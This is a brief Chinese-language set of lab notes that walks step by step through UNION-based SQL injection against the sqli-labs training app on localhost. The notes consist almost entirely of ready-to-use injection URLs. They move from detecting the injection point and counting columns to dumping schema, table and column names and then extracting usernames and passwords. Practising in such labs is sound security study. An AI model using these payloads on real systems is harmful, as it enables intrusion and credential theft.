1.下判斷注入點
and 1=1,and 1=2; ' 等
2.用order by 查看數據庫存在的字段
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 order by 3#
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 order by 4#
3.用union進行聯合查詢,找到數據庫名稱顯示的字段
http://127.0.0.1/sqli-labs-master/Less-2/?id=0 union select 1,2,3#
4.爆出數據庫名稱和用戶名
http://127.0.0.1/sqli-labs-master/Less-2/?id=0 union select 1,database(),current_user()#
爆出所有數據庫
http://127.0.0.1/sqli-labs-master/Less-2/?id=0 union select 1,2,group_concat(schema_name) from information_schema.schemata#
5.爆出數據庫中存在的表名
http://127.0.0.1/sqli-labs-master/Less-2/?id=0 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema =‘security’),3--+
6.爆出表中存在的列名
http://127.0.0.1/sql/Less-2/?id=0 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3-- +
7.爆出用戶名密碼
http://127.0.0.1/sql/Less-1/?id=0 union select 1,(select concat_ws(0x7e,username,password) from users limit 1,1),3-- +